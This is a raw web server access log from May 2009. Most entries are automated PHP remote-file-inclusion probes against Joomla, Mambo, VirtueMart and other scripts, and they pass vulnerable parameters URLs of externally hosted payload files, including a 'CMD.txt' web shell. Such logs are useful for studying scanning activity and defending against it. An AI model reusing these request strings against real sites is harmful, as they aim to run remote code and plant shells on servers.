195.34.78.110 - - [23/May/2009:02:12:25 -0400] "GET /logs//export.php?mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:02:12:26 -0400] "GET /logs/access_log.Q109051100//export.php?mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:02:12:33 -0400] "GET //export.php?mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:02:12:33 -0400] "GET /logs//export.php?mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:02:12:33 -0400] "GET /logs/access_log.Q109051100//export.php?mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
210.109.101.217 - - [23/May/2009:02:13:18 -0400] "GET //?page=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
210.109.101.217 - - [23/May/2009:02:13:18 -0400] "GET /logs/access_log.Q108052400//?page=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
210.109.101.217 - - [23/May/2009:02:13:18 -0400] "GET /logs//?page=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 200 2495 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:02:13:24 -0400] "GET /?option=com_content&do_pdf=1&id=30//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:02:13:24 -0400] "GET /logs/?option=com_content&do_pdf=1&id=30//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 200 2490 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:02:13:24 -0400] "GET /logs/access_log.Q109051100/?option=com_content&do_pdf=1&id=30//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:02:13:28 -0400] "GET /?option=com_content&do_pdf=1&id=30//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:02:13:28 -0400] "GET /logs/?option=com_content&do_pdf=1&id=30//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 200 2490 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:02:13:28 -0400] "GET /?option=com_content&do_pdf=1&id=30//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:02:13:28 -0400] "GET /logs/?option=com_content&do_pdf=1&id=30//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 200 2490 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:02:13:28 -0400] "GET /logs/access_log.Q109051100/?option=com_content&do_pdf=1&id=30//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:02:13:31 -0400] "GET /logs/access_log.Q109051100/?option=com_content&do_pdf=1&id=30//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
196.40.83.75 - - [23/May/2009:02:13:53 -0400] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://svision-online.de/mgfi//administrator/components/com_babackup/classes/fx29id1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
196.40.83.75 - - [23/May/2009:02:13:53 -0400] "GET /logs/access_log.Q109051100//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://svision-online.de/mgfi//administrator/components/com_babackup/classes/fx29id1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
196.40.83.75 - - [23/May/2009:02:13:53 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://svision-online.de/mgfi//administrator/components/com_babackup/classes/fx29id1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
196.40.83.75 - - [23/May/2009:02:14:10 -0400] "GET /logs/access_log.Q109021500//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://svision-online.de/mgfi//administrator/components/com_babackup/classes/fx29id1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
59.120.3.108 - - [23/May/2009:02:14:12 -0400] "GET /index.php?option=com_custompages&cpage=http://www.kolo1976.com/joomla/mambots/echo.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.803"
91.198.47.201 - - [23/May/2009:02:14:50 -0400] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 255 "-" "libwww-perl/5.826"
123.125.64.49 - - [23/May/2009:02:15:19 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
209.59.12.99 - - [23/May/2009:02:15:46 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.173.130.41 - - [23/May/2009:02:16:09 -0400] "GET //add.php?APB_rp=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
121.173.130.41 - - [23/May/2009:02:16:09 -0400] "GET /logs//add.php?APB_rp=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
121.173.130.41 - - [23/May/2009:02:16:09 -0400] "GET /logs/access_log.Q109010700%20%20//add.php?APB_rp=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
121.173.130.41 - - [23/May/2009:02:16:10 -0400] "GET /logs/access_log.Q109042200%20%20//add.php?APB_rp=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
196.40.83.75 - - [23/May/2009:02:16:17 -0400] "GET /logs/access_log.Q109051100%20%20//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://svision-online.de/mgfi//administrator/components/com_babackup/classes/fx29id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
196.40.83.75 - - [23/May/2009:02:16:22 -0400] "GET /logs/access_log.Q109021500%20%20//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://svision-online.de/mgfi//administrator/components/com_babackup/classes/fx29id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
123.125.64.51 - - [23/May/2009:02:16:22 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
121.173.130.41 - - [23/May/2009:02:16:30 -0400] "GET /logs/access_log.Q109010700//add.php?APB_rp=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
121.173.130.41 - - [23/May/2009:02:16:34 -0400] "GET /logs/access_log.Q109042200//add.php?APB_rp=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
59.120.3.108 - - [23/May/2009:02:16:35 -0400] "GET /logs/error_log.Q109022200/index.php?option=com_custompages&cpage=http://www.kolo1976.com/joomla/mambots/echo.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
59.120.3.108 - - [23/May/2009:02:16:46 -0400] "GET /index.php?option=com_custompages&cpage=http://www.kolo1976.com/joomla/mambots/echo.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.803"
59.120.3.108 - - [23/May/2009:02:16:49 -0400] "GET /logs/index.php?option=com_custompages&cpage=http://www.kolo1976.com/joomla/mambots/echo.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.803"
222.239.227.229 - - [23/May/2009:02:16:49 -0400] "GET /logs/error_log.Q108112600//faqsupport/samplefaqsupport.php?path[docroot]=http://www.kolo1976.com/joomla/mambots/echo.txt???? HTTP/1.1" 404 256 "-" "libwww-perl/5.79"
222.239.227.229 - - [23/May/2009:02:16:50 -0400] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.kolo1976.com/joomla/mambots/echo.txt???? HTTP/1.1" 404 230 "-" "libwww-perl/5.79"
59.120.3.108 - - [23/May/2009:02:16:50 -0400] "GET /logs/error_log.Q109021000/index.php?option=com_custompages&cpage=http://www.kolo1976.com/joomla/mambots/echo.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
222.239.227.229 - - [23/May/2009:02:16:50 -0400] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.kolo1976.com/joomla/mambots/echo.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
195.34.78.110 - - [23/May/2009:02:16:55 -0400] "GET //virtuemart_parser.php?mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:02:16:55 -0400] "GET /logs//virtuemart_parser.php?mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:02:16:55 -0400] "GET /logs/access_log.Q109051100//virtuemart_parser.php?mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:02:17:02 -0400] "GET //virtuemart_parser.php?mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:02:17:02 -0400] "GET /logs//virtuemart_parser.php?mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:02:17:02 -0400] "GET /logs/access_log.Q109051100//virtuemart_parser.php?mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:02:17:09 -0400] "GET //virtuemart_parser.php?mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:02:17:10 -0400] "GET /logs//virtuemart_parser.php?mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:02:17:10 -0400] "GET /logs/access_log.Q109051100//virtuemart_parser.php?mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
203.94.155.59 - - [23/May/2009:02:17:32 -0400] "GET //add.php?APB_rp=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
203.94.155.59 - - [23/May/2009:02:17:32 -0400] "GET /logs//add.php?APB_rp=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:02:17:36 -0400] "GET //administrator/components/com_virtuemart/compat.joomla1.5.php?dirname[__FILE__]=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:02:17:36 -0400] "GET /logs//administrator/components/com_virtuemart/compat.joomla1.5.php?dirname[__FILE__]=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:02:17:36 -0400] "GET /logs/access_log.Q109051100//administrator/components/com_virtuemart/compat.joomla1.5.php?dirname[__FILE__]=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:02:17:36 -0400] "GET //administrator/components/com_virtuemart/compat.joomla1.5.php?dirname[__FILE__]=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:02:17:37 -0400] "GET /logs//administrator/components/com_virtuemart/compat.joomla1.5.php?dirname[__FILE__]=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:02:17:37 -0400] "GET /logs/access_log.Q109051100//administrator/components/com_virtuemart/compat.joomla1.5.php?dirname[__FILE__]=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:02:17:41 -0400] "GET //administrator/components/com_virtuemart/compat.joomla1.5.php?dirname[__FILE__]=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:02:17:41 -0400] "GET /logs//administrator/components/com_virtuemart/compat.joomla1.5.php?dirname[__FILE__]=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:02:17:41 -0400] "GET /logs/access_log.Q109051100//administrator/components/com_virtuemart/compat.joomla1.5.php?dirname[__FILE__]=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
203.94.155.59 - - [23/May/2009:02:17:45 -0400] "GET /logs/access_log.Q109010700//add.php?APB_rp=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
203.94.155.59 - - [23/May/2009:02:17:45 -0400] "GET /logs/access_log.Q109042200//add.php?APB_rp=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
85.92.68.111 - - [23/May/2009:02:18:00 -0400] "GET //modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.fhbgc.org/Calendar/tools/fx29id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
85.92.68.111 - - [23/May/2009:02:18:00 -0400] "GET /logs//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.fhbgc.org/Calendar/tools/fx29id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
85.92.68.111 - - [23/May/2009:02:18:00 -0400] "GET /logs/access_log.Q109051100//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.fhbgc.org/Calendar/tools/fx29id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
58.227.193.198 - - [23/May/2009:02:18:42 -0400] "GET /logs/error_log.Q108081200//errors.php?error=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
58.227.193.198 - - [23/May/2009:02:18:42 -0400] "GET /logs/error_log.Q108051600//errors.php?error=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
85.125.233.222 - - [23/May/2009:02:19:16 -0400] "GET /logs/access_log.Q108062800//admin/classes/TplLoad.php?full_path_to_public_program=http://auralmoon.com/albumcovers/idomila.txt? HTTP/1.1" 404 251 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
85.125.233.222 - - [23/May/2009:02:19:16 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://auralmoon.com/albumcovers/idomila.txt? HTTP/1.1" 404 224 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
85.125.233.222 - - [23/May/2009:02:19:16 -0400] "GET /logs/access_log.Q108062800//admin/classes/TplLoad.php?full_path_to_public_program=http://auralmoon.com/albumcovers/idomila.txt? HTTP/1.1" 404 251 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
85.125.233.222 - - [23/May/2009:02:19:17 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://auralmoon.com/albumcovers/idomila.txt? HTTP/1.1" 404 224 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
85.125.233.222 - - [23/May/2009:02:19:32 -0400] "GET /logs/access_log.Q108062800//admin/classes/TplLoad.php?full_path_to_public_program=http://auralmoon.com/albumcovers/idomila.txt? HTTP/1.1" 404 251 "-" "libwww-perl/5.805"
85.125.233.222 - - [23/May/2009:02:19:32 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://auralmoon.com/albumcovers/idomila.txt? HTTP/1.1" 404 224 "-" "libwww-perl/5.805"
85.125.233.222 - - [23/May/2009:02:19:33 -0400] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://auralmoon.com/albumcovers/idomila.txt? HTTP/1.1" 404 229 "-" "libwww-perl/5.805"
85.125.233.222 - - [23/May/2009:02:19:33 -0400] "GET /logs/access_log.Q108062800//admin/classes/TplLoad.php?full_path_to_public_program=http://auralmoon.com/albumcovers/idomila.txt? HTTP/1.1" 404 251 "-" "libwww-perl/5.805"
85.125.233.222 - - [23/May/2009:02:19:33 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://auralmoon.com/albumcovers/idomila.txt? HTTP/1.1" 404 224 "-" "libwww-perl/5.805"
85.125.233.222 - - [23/May/2009:02:19:33 -0400] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://auralmoon.com/albumcovers/idomila.txt? HTTP/1.1" 404 229 "-" "libwww-perl/5.805"
220.245.81.22 - - [23/May/2009:02:19:38 -0400] "GET /logs/access_log.Q108120300/index.php?pagina=http://www.graal-plus.zp.ua//images/r.jpg?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
220.245.81.22 - - [23/May/2009:02:19:43 -0400] "GET /index.php?pagina=http://www.graal-plus.zp.ua//images/r.jpg?? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
220.245.81.22 - - [23/May/2009:02:19:45 -0400] "GET /logs/index.php?pagina=http://www.graal-plus.zp.ua//images/r.jpg?? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
218.246.20.221 - - [23/May/2009:02:19:56 -0400] "GET /logs/access_log.Q108111500/index.php?option=com_custompages&cpage=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
218.246.20.221 - - [23/May/2009:02:20:08 -0400] "GET /logs/index.php?option=com_custompages&cpage=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
218.246.20.221 - - [23/May/2009:02:20:08 -0400] "GET /index.php?option=com_custompages&cpage=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
91.198.47.201 - - [23/May/2009:02:20:14 -0400] "GET /logs/access_log.Q109051100//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 282 "-" "libwww-perl/5.826"
91.198.47.201 - - [23/May/2009:02:20:14 -0400] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 255 "-" "libwww-perl/5.826"
91.198.47.201 - - [23/May/2009:02:20:14 -0400] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.826"
218.246.20.221 - - [23/May/2009:02:20:30 -0400] "GET /logs/error_log.Q108090100/index.php?option=com_custompages&cpage=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
209.59.12.99 - - [23/May/2009:02:20:46 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.246.20.221 - - [23/May/2009:02:20:48 -0400] "GET /logs/access_log.Q108090100/index.php?option=com_custompages&cpage=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
85.125.233.222 - - [23/May/2009:02:21:08 -0400] "GET /logs/access_log.Q108081600//admin/classes/TplLoad.php?full_path_to_public_program=http://auralmoon.com/albumcovers/idomila.txt? HTTP/1.1" 404 251 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
85.125.233.222 - - [23/May/2009:02:21:08 -0400] "GET /logs/access_log.Q108081600//admin/classes/TplLoad.php?full_path_to_public_program=http://auralmoon.com/albumcovers/idomila.txt? HTTP/1.1" 404 251 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
85.125.233.222 - - [23/May/2009:02:21:43 -0400] "GET /logs/access_log.Q108081600//admin/classes/TplLoad.php?full_path_to_public_program=http://auralmoon.com/albumcovers/idomila.txt? HTTP/1.1" 404 251 "-" "libwww-perl/5.805"
85.125.233.222 - - [23/May/2009:02:21:44 -0400] "GET /logs/access_log.Q108081600//admin/classes/TplLoad.php?full_path_to_public_program=http://auralmoon.com/albumcovers/idomila.txt? HTTP/1.1" 404 251 "-" "libwww-perl/5.805"
85.125.233.222 - - [23/May/2009:02:22:37 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://auralmoon.com/albumcovers/idomila.txt? HTTP/1.1" 404 224 "-" "libwww-perl/5.805"
85.125.233.222 - - [23/May/2009:02:22:37 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://auralmoon.com/albumcovers/idomila.txt? HTTP/1.1" 404 224 "-" "libwww-perl/5.805"
218.246.20.221 - - [23/May/2009:02:23:23 -0400] "GET /logs/error_log.Q108090100%20/index.php?option=com_custompages&cpage=http://www.jigangdoyo.com/web_logs/iyoshells/CMD.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
218.246.20.221 - - [23/May/2009:02:23:26 -0400] "GET /index.php?option=com_custompages&cpage=http://www.jigangdoyo.com/web_logs/iyoshells/CMD.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
87.230.85.142 - - [23/May/2009:02:23:35 -0400] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
87.230.85.142 - - [23/May/2009:02:23:35 -0400] "GET /logs/access_log.Q109051100//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
87.230.85.142 - - [23/May/2009:02:23:36 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
38.99.13.118 - - [23/May/2009:02:23:37 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
218.246.20.221 - - [23/May/2009:02:23:38 -0400] "GET /logs/error_log.Q108091300%20/index.php?option=com_custompages&cpage=http://www.jigangdoyo.com/web_logs/iyoshells/CMD.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
222.239.227.229 - - [23/May/2009:02:23:42 -0400] "GET /logs/error_log.Q109012500//faqsupport/samplefaqsupport.php?path[docroot]=http://www.kolo1976.com/joomla/mambots/echo.txt???? HTTP/1.1" 404 256 "-" "libwww-perl/5.79"
38.99.44.103 - - [23/May/2009:02:23:43 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
196.40.83.75 - - [23/May/2009:02:23:54 -0400] "GET /logs/access_log.Q109050700//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://svision-online.de/mgfi//administrator/components/com_babackup/classes/fx29id1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
87.230.85.142 - - [23/May/2009:02:23:56 -0400] "GET /logs/access_log.Q109021500//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
218.246.20.221 - - [23/May/2009:02:24:05 -0400] "GET /logs/access_log.Q108081500%20/index.php?option=com_custompages&cpage=http://www.jigangdoyo.com/web_logs/iyoshells/CMD.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
218.246.20.221 - - [23/May/2009:02:25:04 -0400] "GET /logs/access_log.Q109051100%20/index.php?option=com_custompages&cpage=http://www.jigangdoyo.com/web_logs/iyoshells/CMD.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
200.32.100.130 - - [23/May/2009:02:25:06 -0400] "GET /inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
200.32.100.130 - - [23/May/2009:02:25:06 -0400] "GET /logs/inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
200.32.100.130 - - [23/May/2009:02:25:06 -0400] "GET /logs/access_log.Q109010700/inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
200.32.100.130 - - [23/May/2009:02:25:36 -0400] "GET /logs/access_log.Q109010700%20%20/inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
87.230.85.142 - - [23/May/2009:02:25:50 -0400] "GET /logs/access_log.Q109051100%20%20//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:02:25:51 -0400] "GET /logs/access_log.Q109050300/?option=com_content&do_pdf=1&id=30//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
87.230.85.142 - - [23/May/2009:02:25:59 -0400] "GET /logs/access_log.Q109021500%20%20//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
218.246.20.221 - - [23/May/2009:02:26:19 -0400] "GET /logs/error_log.Q109051400/index.php?option=com_custompages&cpage=http://www.jigangdoyo.com/web_logs/iyoshells/CMD.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
218.246.20.221 - - [23/May/2009:02:26:30 -0400] "GET /logs/access_log.Q108081500/index.php?option=com_custompages&cpage=http://www.jigangdoyo.com/web_logs/iyoshells/CMD.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
200.32.100.130 - - [23/May/2009:02:26:33 -0400] "GET //?custompluginfile[]=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
200.32.100.130 - - [23/May/2009:02:26:33 -0400] "GET /logs//?custompluginfile[]=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 200 2495 "-" "Mozilla/5.0"
200.32.100.130 - - [23/May/2009:02:26:33 -0400] "GET /logs/access_log.Q109030500%20%20//?custompluginfile[]=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
